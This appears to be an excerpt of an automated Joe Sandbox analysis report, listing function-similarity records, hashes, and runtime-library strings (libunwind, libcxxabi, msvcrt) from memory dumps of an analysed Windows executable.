                                      • String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
                                      • API String ID: 2044551959-1509371760
                                      • Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
                                      • Instruction ID: 9a56498c59801da2cf9196d782d9a084f096ed0655cd518cc02b6899cade979f
                                      • Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
                                      • Instruction Fuzzy Hash: E4011D20E1B10742FA94AF52EA512F422675FD4784F7C0871D91DC6BE3EE2CB8519300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_info(cursor=%p, &info=%p)
                                      • API String ID: 1137233558-1935908800
                                      • Opcode ID: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
                                      • Instruction ID: 803faaa5588d0a2446cb4036055ad7d7c3f99058c28057477c8364a1daa42c54
                                      • Opcode Fuzzy Hash: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
                                      • Instruction Fuzzy Hash: F6019210E0F69642FB149F26E9453B52766AF48BD0F2C4035CD2E977E3EE2CA9818300
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6099B19FB
                                      • (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF6099B19F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertabort
                                      • String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp
                                      • API String ID: 1072228434-1306384422
                                      • Opcode ID: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
                                      • Instruction ID: 457418d3839cb12122cca8dc640e875e4a0c56d7eb08bacd4b7b635a17554371
                                      • Opcode Fuzzy Hash: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
                                      • Instruction Fuzzy Hash: 19014623E0E69650FE768F45F7A117812A6AF54392F7D0436CE4DD2393EE2DB8898200
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: basi$basic_istream
                                      • API String ID: 2326172077-1189760207
                                      • Opcode ID: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
                                      • Instruction ID: 369dfa2cc5287d9445791d5dfb2fe814ae20edcc8fdb286cc3e02d91663da602
                                      • Opcode Fuzzy Hash: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
                                      • Instruction Fuzzy Hash: 4E0184E2F0A65283EA648F06F980769A392DB187C0F588431CB5D47B86EF2CE5508300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: basi$basic_iostream
                                      • API String ID: 2326172077-3201662033
                                      • Opcode ID: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
                                      • Instruction ID: 54b4849e2ccaa3856686a44585e0592b7d1b5b7cd1426123d15c016e6573f3fa
                                      • Opcode Fuzzy Hash: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
                                      • Instruction Fuzzy Hash: 1AF062F6B0675283EA648F06FA80769A792EB687C4F588431CB5D47B86EF2CD5908300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
                                      • API String ID: 1137233558-227906034
                                      • Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
                                      • Instruction ID: 70e6121850070ffdee5434f5bcd7b0dcb84beb5b8348b8da1702e85e82f45e7b
                                      • Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
                                      • Instruction Fuzzy Hash: DF01FD10E0F69642FB10AF26E9543B837625F49BC1F2C0035CE1E937E3DE2CA9828301
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_step(cursor=%p)
                                      • API String ID: 1137233558-3760164396
                                      • Opcode ID: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
                                      • Instruction ID: e9078e9edca9f22bc9a5e6fd38b176952543119ba480132a2a02723200bfb403
                                      • Opcode Fuzzy Hash: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
                                      • Instruction Fuzzy Hash: 4E016710E0F69642F7149F66E9412B427675F55B90F684035CD1E937D3DE6D65418300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: ExceptionRaisefflush
                                      • String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
                                      • API String ID: 3404444629-1152080672
                                      • Opcode ID: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
                                      • Instruction ID: d7be514cd07215df4fee18517b153daa8b9add0c634b87bdbdec64db8432b465
                                      • Opcode Fuzzy Hash: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
                                      • Instruction Fuzzy Hash: F4F0C210E0969543F629AF6ABA462F45376AF887D1F185135EE4D83793FE3D9A828300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: _localtime64_s$msvcrt.dll
                                      • API String ID: 1646373207-3474473506
                                      • Opcode ID: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
                                      • Instruction ID: a420a20bf855430324d8e53969a62a5b1cae2a5c24588df027980f9000e63e12
                                      • Opcode Fuzzy Hash: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
                                      • Instruction Fuzzy Hash: 89F0DA64B0EA5691EE45DF46ED940B42362AF58BD1FA84436DC0D83361FE6CA5898300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: _localtime64_s$msvcrt.dll
                                      • API String ID: 1646373207-3474473506
                                      • Opcode ID: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
                                      • Instruction ID: 3763de4dac2272f0242635a3e5289398d34d283646ab18314ba1a8d58246e87c
                                      • Opcode Fuzzy Hash: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
                                      • Instruction Fuzzy Hash: B2F0DA64B0EA5691EE45DF46ED940B42362AF58BD1FA84436DC0DC3361FE6CA5898300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSection$free
                                      • String ID:
                                      • API String ID: 2017658852-0
                                      • Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
                                      • Instruction ID: 4d3bd39b06daf9f4cfc5a778904774a0dfd4e755523ecc0b58a3278b3bc6c756
                                      • Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
                                      • Instruction Fuzzy Hash: A7516B21A1BA4681FB549F05E99537963A3AF64B94F3C0435CD6E877A2EF3CE481C350
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: free$memcpy
                                      • String ID:
                                      • API String ID: 4107583993-0
                                      • Opcode ID: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
                                      • Instruction ID: a11ef4ddeeb90b86b1967bd4d6df1dff1eba0a70563978dbfb20fdfd50448db9
                                      • Opcode Fuzzy Hash: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
                                      • Instruction Fuzzy Hash: D35109B2605B9187DA64CF16F5886AAB3B9F744784F254135CBDE83BA1EF3DE0918300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
                                      • Instruction ID: 851d5f15d01092542780299c4da9203f3c52c8e3fba25699bdd696af3cf527c2
                                      • Opcode Fuzzy Hash: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
                                      • Instruction Fuzzy Hash: 8B118726A0B58646DDAADE16E1941F953A6EF44780F6C0131DB9F87B93DE2DE582C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$memcpy
                                      • String ID:
                                      • API String ID: 3800483350-0
                                      • Opcode ID: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
                                      • Instruction ID: 7de5ff840fea9d0375ac7249ce23984e2338521b769ed7fef4f46693ab6c0600
                                      • Opcode Fuzzy Hash: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
                                      • Instruction Fuzzy Hash: C2A1C6A3A0AB4685FA618F15E94027D67A2AB44B94F2C4531DF9D877D6EF3CE482C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
                                      • Instruction ID: 7321064d2cce6e3e4d8c1e23ca361c4a4704cd3264a4021878b4b3cad22d5dda
                                      • Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
                                      • Instruction Fuzzy Hash: 2791A772A1424287E7348E2AE69477977B6EB147A4F288135CB5AC7BD2DF2CF451CB00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
                                      • Instruction ID: cf69727a6abc6136b61f79d035ac864db59edb99da5397bb84eeb5f878093cfa
                                      • Opcode Fuzzy Hash: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
                                      • Instruction Fuzzy Hash: CF91A533A0E28687F7388E6AD58477976A2EB15794F288135CB5AC77C2DF2DF4818740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
                                      • Instruction ID: ecd92469852d430bc45c87eee581c0d79a08a3141dfd07e6c72dc4bb8e20251a
                                      • Opcode Fuzzy Hash: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
                                      • Instruction Fuzzy Hash: 7E7124B6A09B9583DE248F16E9541797763EB58BC0F248832DB9E877A5DF3CE442C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
